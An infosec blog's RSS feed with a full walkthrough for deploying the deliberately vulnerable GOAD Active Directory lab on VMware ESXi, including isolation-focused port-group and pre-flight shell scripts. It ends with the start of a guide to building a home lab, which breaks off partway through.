<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>NetSec Focus</title>
        <atom:link href="/feed.xml" rel="self" type="application/rss+xml"/>
        <link>https://netsec-focus.github.io/</link>
        <description></description>
        <pubDate>Wed, 21 Aug 2024 15:25:09 +0000</pubDate>
        
        <item>
            <title>Setting Up and Installing GOAD or GOAD-Light on VMware ESXi</title>
            <link>/infosec/walkthrough/2024/08/21/Setting_up_and_Installing_GOAD_or_GOAD-Light_on_VMware_ESXI.html</link>
            <guid isPermaLink="true">/infosec/walkthrough/2024/08/21/Setting_up_and_Installing_GOAD_or_GOAD-Light_on_VMware_ESXI.html</guid>
            <description>&lt;h1 id=&quot;setting-up-and-installing-goad-or-goad-light-on-vmware-esxi&quot;&gt;Setting Up and Installing GOAD or GOAD-Light on VMware ESXi&lt;/h1&gt;

&lt;h2 id=&quot;table-of-contents&quot;&gt;Table of Contents&lt;/h2&gt;
&lt;ol&gt;
  &lt;li&gt;&lt;a href=&quot;#introduction&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#a-word-of-caution&quot;&gt;A Word of Caution&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#a-word-of-advice&quot;&gt;A Word of Advice&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#requirements-to-deploy-goad&quot;&gt;Requirements to Deploy GOAD&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#current-esxi-setup&quot;&gt;Current ESXi Setup&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#configure-goad-network-group&quot;&gt;Configure GOAD Network Group&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#obtain-required-packages-to-deploy-goad-with-our-linux-machine&quot;&gt;Obtain Required Packages to Deploy GOAD with Our Linux Machine&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#stage-1-deploying-the-goad-environment&quot;&gt;Stage 1: Deploying the GOAD Environment&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#conclusion&quot;&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p&gt;Over the years, I’ve been refining and automating vulnerable Active Directory environments in my homelab for testing. However, as these setups I created grew in complexity, managing the tools, scripts, and resources became a challenge. I needed a more efficient way to quickly spin up and tear down these environments without the hassle. That’s when I discovered GOAD by Orange Cyberdefense. In my experience, it is a game-changer for anyone serious about Active Directory security testing.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/Orange-Cyberdefense/GOAD&quot;&gt;GOAD&lt;/a&gt; (Game of Active Directory) is a comprehensive Active Directory (AD) lab environment designed for security testing, training, and learning. It lets pentesters and security researchers simulate real-world AD environments to practice attack and defense techniques. The lab is highly customizable: users can configure different scenarios, user accounts, policies, and network topologies to mirror a production AD setup.&lt;/p&gt;

&lt;p&gt;In this guide, I will walk you through the steps needed to install and configure GOAD on VMware ESXi.&lt;/p&gt;

&lt;h2 id=&quot;a-word-of-caution&quot;&gt;A Word of Caution&lt;/h2&gt;

&lt;p&gt;This lab environment is intentionally vulnerable. Do not reuse this setup for production environments, and ensure it is isolated from any production networks. Never deploy it on the internet without strict isolation measures.&lt;/p&gt;

&lt;h2 id=&quot;a-word-of-advice&quot;&gt;A Word of Advice&lt;/h2&gt;

&lt;p&gt;As of the time of writing, the Orange-Cyberdefense team has not yet merged the contributions from viris and fsacer into the main GOAD project. Their forked versions of GOAD include the vmware_esxi provider, which we’ll be using for deployment. If you want to review and compare the enhancements they’ve made, you can check out their work:&lt;/p&gt;

&lt;p&gt;Viris version of GOAD: &lt;a href=&quot;https://github.com/viris/GOAD&quot;&gt;https://github.com/viris/GOAD&lt;/a&gt;
Fsacer version of GOAD: &lt;a href=&quot;https://github.com/fsacer/GOAD&quot;&gt;https://github.com/fsacer/GOAD&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;requirements-to-deploy-goad&quot;&gt;Requirements to Deploy GOAD&lt;/h2&gt;

&lt;p&gt;Before deploying the GOAD environment on your ESXi server, there are a few things to have in place:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Disk space: a minimum of 125GB is needed to build the lab.&lt;/li&gt;
  &lt;li&gt;Memory: 6-8GB should be allocated to each system in the lab.&lt;/li&gt;
  &lt;li&gt;Networking: the ability to create port groups, so the GOAD builder can create the connections and interfaces that separate the lab from your personal network.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Operating System:&lt;/p&gt;

&lt;p&gt;This lab is designed to be installed from a Linux host, and all testing has been conducted using Linux. Some users have set it up from Windows, which works with a split approach:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;VM creation: the VMs can be created from Windows using Vagrant.&lt;/li&gt;
  &lt;li&gt;Ansible provisioning: the provisioning step must be executed from a Linux machine.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you create the VMs from Windows, the Linux machine used for provisioning must have two network adapters: one on “VM Network” and the other on the same virtual private network or port group as the lab. This is what lets the provisioning scripts reach the lab VMs on the lab network.&lt;/p&gt;

&lt;p&gt;It is up to you which operating system you deploy GOAD from, but in this guide we are going to use Linux.&lt;/p&gt;

&lt;h2 id=&quot;current-esxi-setup&quot;&gt;Current ESXi Setup&lt;/h2&gt;
&lt;p&gt;Here is the current setup that I will be using to deploy the GOAD environment:&lt;/p&gt;

&lt;p&gt;Hardware:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;CPU: 24 CPUs x Intel(R) Xeon(R) CPU E5-2690 v3 @ 2.60GHz&lt;/li&gt;
  &lt;li&gt;Memory: 400GB DDR4&lt;/li&gt;
  &lt;li&gt;Storage: 4TB of lab storage&lt;/li&gt;
  &lt;li&gt;ESXi Version: 8.0 Update 2&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;configure-goad-network-group&quot;&gt;Configure GOAD Network Group&lt;/h2&gt;

&lt;p&gt;Before we set up our Linux system to build the GOAD environment, we need to create a network port group that carries the lab’s virtual private network. The lab VMs also get an interface on “VM Network” (the GOAD_VAGRANT_ESXINETNAT setting in the .env file we edit later), so the GOAD port group itself can sit on a vSwitch with no physical uplink attached. That is the simplest way to honour the warning above: VMs on an uplink-less vSwitch can talk to each other and to the deployer’s second NIC, but nothing on that port group can reach your real network.&lt;/p&gt;

&lt;p&gt;Once you log in to the ESXi host client, click “Networking” under the “Navigator” pane on the left-hand menu. Then:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Under the “Port groups” tab, click “Add port group” and pick the virtual switch (vSwitch) the new port group should belong to. For an isolated lab, use a vSwitch that has no physical uplink.&lt;/li&gt;
  &lt;li&gt;Name: enter GOAD as the name of the new port group. This is the value that goes into GOAD_VAGRANT_ESXINETDOM later.&lt;/li&gt;
  &lt;li&gt;VLAN ID: specify a VLAN ID only if your switch setup requires one; leave it at 0 if no VLAN tagging is needed.&lt;/li&gt;
  &lt;li&gt;Security: leave Promiscuous mode, MAC address changes and Forged transmits at their default of Reject unless you have a specific reason to accept them. Accepting promiscuous mode lets any VM on the port group sniff every other VM’s traffic, which you may want for a sensor VM later, but it should be a deliberate choice.&lt;/li&gt;
  &lt;li&gt;Click “Add” to create the port group.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Ensure that the new port group GOAD appears in the list of port groups under the selected vSwitch.&lt;/p&gt;
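&lt;p&gt;The same port group can be created from the ESXi shell, which is handy if you rebuild the lab often. The script below is an added example for this guide, not code from GOAD or the viris/fsacer forks. It assumes SSH access to the host, a vSwitch name of vSwitchGOAD (any unused name works), and the port group name GOAD from the steps above. It deliberately attaches no uplink to the new vSwitch, keeps the three security settings at Reject, and then reads the esxcli listings back to confirm the switch really has no uplinks before it reports success.&lt;/p&gt;

```shell
#!/bin/sh
# Added example for this guide (not part of GOAD or the viris/fsacer forks):
# create the GOAD port group from the ESXi shell instead of the web UI, on a
# dedicated vSwitch that has no physical uplink, so lab traffic cannot reach
# your LAN. Copy it to the host and run:  sh goad-portgroup.sh apply
# The vSwitch name is an assumption; the port group name matches the guide.

VSWITCH=${VSWITCH:-vSwitchGOAD}
PORTGROUP=${PORTGROUP:-GOAD}

# vswitch_uplinks LIST_OUTPUT NAME: print the "Uplinks:" value of vSwitch NAME
# from "esxcli network vswitch standard list" output. Empty means isolated.
vswitch_uplinks() {
    printf '%s\n' "$1" | awk -v want="$2" '
        /^[^ ]/ { cur = $1; next }
        cur == want {
            if ($0 ~ /^ *Uplinks:/) { sub(/^ *Uplinks:[ ]*/, ""); print; exit }
        }'
}

# portgroup_vlan LIST_OUTPUT NAME: print the VLAN ID column for port group NAME
# from "esxcli network vswitch standard portgroup list" (names may contain spaces).
portgroup_vlan() {
    printf '%s\n' "$1" | awk -v want="$2" '
        substr($0, 1, length(want) + 1) == want " " { print $NF; exit }'
}

if [ "${1:-}" = "apply" ]; then
    # No "uplink add" on purpose: without a vmnic the switch has no path to
    # the physical network, which is the isolation the lab needs.
    esxcli network vswitch standard add --vswitch-name="$VSWITCH"
    esxcli network vswitch standard portgroup add \
        --portgroup-name="$PORTGROUP" --vswitch-name="$VSWITCH"
    esxcli network vswitch standard portgroup set \
        --portgroup-name="$PORTGROUP" --vlan-id=0
    # Keep the three security overrides at reject. Accepting promiscuous mode
    # would let any lab VM sniff every other VM on the port group.
    esxcli network vswitch standard portgroup policy security set \
        --portgroup-name="$PORTGROUP" --allow-promiscuous=false \
        --allow-mac-change=false --allow-forged-transmits=false

    # Verify: the new switch must report no uplinks; print the VLAN for the record.
    up=$(vswitch_uplinks "$(esxcli network vswitch standard list)" "$VSWITCH")
    if [ -n "$up" ]; then
        echo "WARNING: $VSWITCH has uplinks ($up); lab traffic can leave the host"
        exit 1
    fi
    vlan=$(portgroup_vlan "$(esxcli network vswitch standard portgroup list)" "$PORTGROUP")
    echo "$PORTGROUP created on isolated $VSWITCH, VLAN ID $vlan"
fi
```

&lt;p&gt;Run it as sh goad-portgroup.sh apply on the host; without the argument it only defines the two helpers. If a sensor VM later needs to see all lab traffic, flip --allow-promiscuous for this one port group rather than for the whole vSwitch, so the exception stays visible and scoped.&lt;/p&gt;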

&lt;h2 id=&quot;obtain-required-packages-to-deploy-goad-with-our-linux-machine&quot;&gt;Obtain Required Packages to Deploy GOAD with Our Linux Machine&lt;/h2&gt;

&lt;p&gt;Note: While deploying the GOAD environment, I used my Kali Linux system to accomplish this. The instructions I am providing should also work for other Linux operating systems. You may have to install some other packages and plugins to make sure the lab can be deployed properly in your ESXi server.&lt;/p&gt;

&lt;p&gt;Remember, you want two network interfaces configured on your Kali Linux system. One interface should be connected to your VM Network and the other to the GOAD network. Otherwise GOAD will not deploy the systems and set the network configurations properly during the deployment.&lt;/p&gt;

&lt;p&gt;By default the GOAD network has the boxes set to be on the 192.168.56.0/24 network. For the second interface, the one connected to the GOAD environment, I set my Kali Linux to 192.168.56.2 with a /24 subnet and the gateway set as 192.168.56.1.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Install the following packages:&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# Vagrant creates the VMs, Ansible provisions them (ansible-core is the package name)
sudo apt install vagrant ansible ansible-core
# pywinrm lets Ansible talk WinRM to the Windows hosts
sudo pip3 install pywinrm
# on a recent Kali, pip refuses system-wide installs (externally-managed-environment);
# install pywinrm into a virtualenv that you activate before running goad.sh instead
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;ol start=&quot;2&quot;&gt;
  &lt;li&gt;Install the Vagrant ESXi plugins:&lt;/li&gt;
&lt;/ol&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;vagrant plugin install vagrant-vmware-esxi
vagrant plugin install vagrant-reload
vagrant plugin install vagrant-vmware-desktop
vagrant plugin install winrm
vagrant plugin install winrm-fs
vagrant plugin install winrm-elevated
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;ol start=&quot;3&quot;&gt;
  &lt;li&gt;Install VMware OVF Tool&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Thanks to Broadcom changing VMware’s URL structure, it took me some time to find the latest version of OVF Tool for Linux.&lt;/p&gt;

&lt;p&gt;Source: https://developer.broadcom.com/tools/open-virtualization-format-ovf-tool/latest&lt;/p&gt;

&lt;p&gt;Download the “OVF Tool for Linux Zip” package. The version used here is 4.6.3.&lt;/p&gt;

&lt;p&gt;Once you have downloaded the zip file and extracted it on your Kali Linux machine, either export the path in your current shell or add the same export line to your .bashrc so it persists across sessions:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

# prepend the extracted ovftool directory (adjust the path to where you unzipped it)
$ export PATH=&quot;$HOME/Downloads/VMware-ovftool-4.6.3-24031167-lin.x86_64/ovftool:$PATH&quot;

# confirm the binary is found before going further
$ ovftool --version
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Once the path has been added and ovftool --version runs from the terminal, we can start the process to deploy GOAD.&lt;/p&gt;

&lt;h2 id=&quot;stage-1-deploying-the-goad-environment&quot;&gt;Stage 1: Deploying the GOAD Environment&lt;/h2&gt;

&lt;p&gt;Now that we have the necessary packages, plugins, and tools installed, we need to make some changes to the configuration files in the vmware_esxi directory under the providers folder. To do this, clone the fork and move into the provider directory:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ git clone https://github.com/viris/GOAD
$ cd GOAD/ad/GOAD/providers/vmware_esxi
$ ls -a
.  ..  .env  inventory  .vagrant  Vagrantfile
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;In the .env file, fill in the values GOAD needs to reach your ESXi server. Two things to keep in mind. First, the file holds the ESXi password in plaintext, so restrict it to your user (chmod 600 .env) and do not commit your edited copy back to the repository; it is part of the checked-out tree, as the ls -a output above shows. Second, GOAD_VAGRANT_ESXINETNAT names the port group the lab VMs use alongside the GOAD network, and on a default ESXi install “VM Network” sits on vSwitch0 together with the physical uplink, so the intentionally vulnerable machines will also have an address on whatever network that uplink is plugged into. The values below are placeholders for your own host:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tjnull@conops:/opt/GOAD/ad/GOAD/providers/vmware_esxi$ cat .env
export GOAD_VAGRANT_ESXIHOSTNAME=&apos;10.10.10.10&apos;
export GOAD_VAGRANT_ESXIUSERNAME=&apos;root&apos;
export GOAD_VAGRANT_ESXIPASSWORD=&apos;password&apos;
export GOAD_VAGRANT_ESXINETNAT=&apos;VM Network&apos;
export GOAD_VAGRANT_ESXINETDOM=&apos;GOAD&apos;
export GOAD_VAGRANT_ESXISTORE=&apos;datastore1&apos;
tjnull@conops:/opt/GOAD/ad/GOAD/providers/vmware_esxi$
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;You do not need to make any changes to the Vagrantfile or to the inventory file. To see whether Vagrant can reach the ESXi server, you can run vagrant up from this directory; since the .env file is a list of export statements, source it first (. .env) so the variables are in Vagrant’s environment. Vagrant will then begin to deploy the GOAD virtual machines to your ESXi server. This does not run the Ansible playbooks that apply the vulnerable configurations to those machines.&lt;/p&gt;

&lt;p&gt;The Vagrantfile already has the systems set to the 192.168.56.0/24 network.&lt;/p&gt;
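&lt;p&gt;Before running vagrant up it is worth checking the deployer itself, because the two things this guide configures by hand (the second NIC and the credentials file) are also the two things Vagrant cannot fix for you. The script below is an added pre-flight check written for this guide, not part of GOAD or the viris/fsacer forks. It assumes the .env path from the listing above (ad/GOAD/providers/vmware_esxi/.env, relative to the clone) and the 192.168.56.0/24 lab network from the Vagrantfile. It parses the .env for the six GOAD_VAGRANT_ESXI* variables, refuses a file that other users can read (it stores the ESXi password in plaintext), finds which interface sits on the lab network, and confirms ovftool and the vagrant-vmware-esxi plugin are available.&lt;/p&gt;

```shell
#!/bin/sh
# Added pre-flight check for the Linux deployer (example code, not part of
# GOAD or the viris/fsacer forks). It verifies the two things this guide
# configures by hand before "vagrant up": the .env file holding the ESXi
# credentials, and the second NIC on the 192.168.56.0/24 lab network.
# Usage from the GOAD clone:  sh goad-preflight.sh run [path/to/.env]
# The default .env path is an assumption taken from the guide's listing.

REQUIRED_VARS="GOAD_VAGRANT_ESXIHOSTNAME GOAD_VAGRANT_ESXIUSERNAME \
GOAD_VAGRANT_ESXIPASSWORD GOAD_VAGRANT_ESXINETNAT GOAD_VAGRANT_ESXINETDOM \
GOAD_VAGRANT_ESXISTORE"
LAB_PREFIX="192.168.56."

# env_value FILE VAR: print the value of an "export VAR='value'" line in FILE.
env_value() {
    sed -n "s/^[[:space:]]*export[[:space:]]\{1,\}$2=//p" "$1" | head -n 1 \
        | sed "s/^['\"]//; s/['\"]$//"
}

# check_env_file FILE: 0 when every variable has a value and the file is not
# readable by group/others (it stores the ESXi password in plaintext).
check_env_file() {
    f=$1
    rc=0
    if [ ! -f "$f" ]; then
        echo "missing $f"
        return 1
    fi
    for v in $REQUIRED_VARS; do
        if [ -z "$(env_value "$f" "$v")" ]; then
            echo "$v is empty in $f"
            rc=1
        fi
    done
    # ls -ld prints e.g. -rw-------; columns 5-10 are the group/other bits.
    if [ "$(ls -ld "$f" | cut -c5-10)" != "------" ]; then
        echo "$f is readable by group/others; fix with: chmod 600 $f"
        rc=1
    fi
    return $rc
}

# lab_iface ADDR_LINES: given "ip -o -4 addr show" output, print the interface
# that carries an address on the lab network (nothing if there is none).
lab_iface() {
    printf '%s\n' "$1" | awk -v p="$LAB_PREFIX" '
        $3 == "inet" { if (index($4, p) == 1) { print $2; exit } }'
}

# iface_count ADDR_LINES: number of distinct non-loopback interfaces with IPv4.
iface_count() {
    printf '%s\n' "$1" | awk '$3 == "inet" { if ($2 != "lo") print $2 }' \
        | sort -u | wc -l | tr -d ' '
}

if [ "${1:-}" = "run" ]; then
    env_file=${2:-ad/GOAD/providers/vmware_esxi/.env}
    ok=0
    check_env_file "$env_file" || ok=1
    addrs=$(ip -o -4 addr show)
    lab=$(lab_iface "$addrs")
    if [ -z "$lab" ]; then
        echo "no interface on ${LAB_PREFIX}0/24: attach a second NIC to the GOAD port group"
        ok=1
    fi
    if [ "$(iface_count "$addrs")" -lt 2 ]; then
        echo "only one NIC with an address: VM Network and GOAD are both needed"
        ok=1
    fi
    ovftool_path=$(command -v ovftool) || { echo "ovftool is not on PATH"; ok=1; }
    vagrant plugin list | grep -q '^vagrant-vmware-esxi ' \
        || { echo "vagrant-vmware-esxi plugin is not installed"; ok=1; }
    if [ "$ok" -eq 0 ]; then
        echo "pre-flight OK: lab NIC is $lab, ovftool at $ovftool_path"
    fi
    exit "$ok"
fi
```

&lt;p&gt;Run it from the top of the clone with sh goad-preflight.sh run, or pass the .env path as a second argument if your layout differs. A non-zero exit means one of the checks printed a reason; fix that before touching vagrant up, since a half-created VM set on ESXi is slower to clean up than a missing route on the deployer.&lt;/p&gt;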

&lt;p&gt;If you would rather run the VM deployment and the Ansible configuration in one go, use the GOAD script. Deploying the environment this way can take a long time, so start with the check task:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t check -l GOAD -p vmware_esxi -m local
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;The script prints the list of checks that GOAD runs. Read through the results, and if they all pass, start the installation by running the following command:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t install -l GOAD -p vmware_esxi -m local
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;If you already ran vagrant up and can see the virtual machines in ESXi, run the following command instead:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;tjnull@auto-kali:/opt/GOAD/$ ./goad.sh -t check -l GOAD -p vmware_esxi -m local -a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The -a option only runs the Ansible playbooks, which apply the vulnerable configurations to the Active Directory environment. The installation will take some time. Once the deployment has completed you will get a notification in your output, and you can begin assessing the GOAD environment!&lt;/p&gt;

&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;A huge shoutout to Viris and Fsacer for creating the vmware_esxi provider for GOAD. I think it is an exceptional environment for any infosec professional looking to sharpen their skills in Active Directory security. It provides a realistic, fully-featured Active Directory environment that is intentionally vulnerable, offering an ideal playground for practicing attack techniques, testing detection tools, and exploring defense strategies. By investing time in GOAD, you gain hands-on experience with real-world scenarios, enabling you to better understand the complexities of Active Directory exploitation and defense. It’s an invaluable resource for both learning and advancing your expertise in securing critical infrastructure.&lt;/p&gt;
</description>
            <pubDate>Wed, 21 Aug 2024 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>TJnull&apos;s guide to building a Home Lab </title>
            <link>/home/lab/2022/07/31/Tjnulls_guide_to_building_a_Home_Lab.html</link>
            <guid isPermaLink="true">/home/lab/2022/07/31/Tjnulls_guide_to_building_a_Home_Lab.html</guid>
            <description>&lt;h3 id=&quot;table-of-contents&quot;&gt;Table of Contents&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;#introduction&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#a-word-of-advice&quot;&gt;A word of advice&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#why-should-you-build-a-home-lab&quot;&gt;Why should you build a home lab?&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#things-you-need-to-consider&quot;&gt;Things you need to consider&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#hardware&quot;&gt;Hardware&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#hunting-for-hardware&quot;&gt;Hunting for Hardware&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#network&quot;&gt;Network&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#software&quot;&gt;Software&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#virtualization-software&quot;&gt;Virtualization Software&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#network-virtual-devices&quot;&gt;Network Virtual Devices&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#operating-systems&quot;&gt;Operating Systems&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#windows&quot;&gt;Windows&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#unix-and-nix&quot;&gt;Unix and *Nix&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#apple-mac-os&quot;&gt;Apple Mac OS&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#daemonsservices&quot;&gt;Daemons/Services&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#monitoring-servicessystems&quot;&gt;Monitoring Services/Systems&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#other-resources&quot;&gt;Other Resources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#conclusion&quot;&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;introduction&quot;&gt;Introduction:&lt;/h1&gt;

&lt;p&gt;When I started my infosec journey, I remember attending an awesome talk called &quot;&lt;a href=&quot;http://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t206-the-avatar-project-and-you-da667&quot;&gt;The AVATAR Project and You&lt;/a&gt;&quot; by da_667 at BSides Charm 2017. &lt;a href=&quot;https://twitter.com/da_667?s=20&quot;&gt;Da_667&lt;/a&gt; talked about a guide he was writing on building your own lab environment, which would allow you to tailor it to suit your own needs. This talk and his book &quot;&lt;a href=&quot;https://leanpub.com/avatar&quot;&gt;Building Virtual Machine Labs: A Hands-On Guide&lt;/a&gt;&quot; were where my journey to build my home lab began.&lt;/p&gt;

&lt;p&gt;In this guide I will provide a variety of tips, tools, and resources to help you get some ideas on how to build your home lab.&lt;/p&gt;

&lt;h1 id=&quot;a-word-of-advice&quot;&gt;A word of advice:&lt;/h1&gt;

&lt;p&gt;This guide does not contain all the answers you will need to build your home lab. You should use it as a way for getting ideas on how you want to build your home lab. In addition, you should also think about the type of environment you want to set up to practice/build your skillset. After all, this should be a fun and exciting adventure to try out!&lt;/p&gt;

&lt;p&gt;Take the time to do your research.&lt;/p&gt;

&lt;h1 id=&quot;why-should-you-build-a-home-lab&quot;&gt;Why should you build a home lab?&lt;/h1&gt;

&lt;p&gt;This lab should be the place you use to build your skills, whether you are in infosec or IT. Having a home lab will allow you to try out new things and build different topologies. It should be a place where you can build anything you need and tear it down when things go wrong.&lt;/p&gt;

&lt;p&gt;It is important to have a separate system that does not contain any important data such as personal files, sensitive information, etc. This system/lab will be your playground.&lt;/p&gt;

&lt;h1 id=&quot;things-you-need-to-consider&quot;&gt;Things you need to consider:&lt;/h1&gt;

&lt;p&gt;Before you decide to spin up an entire datacenter in your house (you do not need to do that, trust me) there are some things you want to think about. Here are some questions you should ask yourself first:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;What are you building this lab for?&lt;/li&gt;
  &lt;li&gt;What is your budget? How much are you willing to spend?
    &lt;ul&gt;
      &lt;li&gt;Will you have enough funds to continue to maintain and also scale it?&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Do you have the ability to set up a wired network? If not, will you be able to set up a wireless connection?&lt;/li&gt;
  &lt;li&gt;How many virtual machines do you want to run and utilize?
    &lt;ul&gt;
      &lt;li&gt;What are the system requirements for each virtual machine?&lt;/li&gt;
      &lt;li&gt;Do you plan to have backups for these systems?&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;Will this lab be running in your house all the time?
    &lt;ul&gt;
      &lt;li&gt;Will you have enough power to run your home lab?&lt;/li&gt;
      &lt;li&gt;Do you have a dedicated area that has proper cooling?&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
  &lt;li&gt;If you are thinking of buying a server, do you have enough space in your home? Rack or tower?&lt;/li&gt;
  &lt;li&gt;Have you mapped out what the network is going to look like?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Once you have answered these questions, you can move forward.&lt;/p&gt;

&lt;h1 id=&quot;hardware&quot;&gt;Hardware&lt;/h1&gt;

&lt;p&gt;Depending on the situation, the machine you already have may not be powerful enough for everything you want in your lab, but it is usually enough to get started.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Upgrading Hardware:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It is important to look into the following parts to upgrade in your system:&lt;/p&gt;

&lt;p&gt;RAM/memory: The more RAM you have in your system, the more virtual machines you can run at the same time and the better they will perform.&lt;/p&gt;

&lt;p&gt;Storage: Depending on the project/systems you want to spin up, you are going to need some drives to store all of it. Having multiple drives will make it easier to consolidate your machines and also give you the ability to conduct backups in case something happens. In addition, you can look into getting a network attached storage (NAS) to consolidate your machines in a separate place.&lt;/p&gt;

&lt;p&gt;If you want a site that reviews different types of drives and storage solutions, &lt;a href=&quot;https://www.storagereview.com/consumer&quot;&gt;https://www.storagereview.com/consumer&lt;/a&gt; is a good place to find recommendations.&lt;/p&gt;

&lt;p&gt;CPU: More cores and a higher clock speed let you run more virtual machines and tasks in parallel. If you plan to run virtual machines, make sure your CPU supports hardware virtualization (Intel VT-x or AMD-V) and that the feature is enabled in the BIOS/UEFI.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dedicated Machine:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Having a dedicated machine or converting an old machine is a great way to run your virtual machines in a separate environment. Keep in mind that all three areas mentioned in &apos;Upgrading Hardware&apos; (CPU, RAM, storage) need the highest priority when you plan a dedicated machine.&lt;/p&gt;

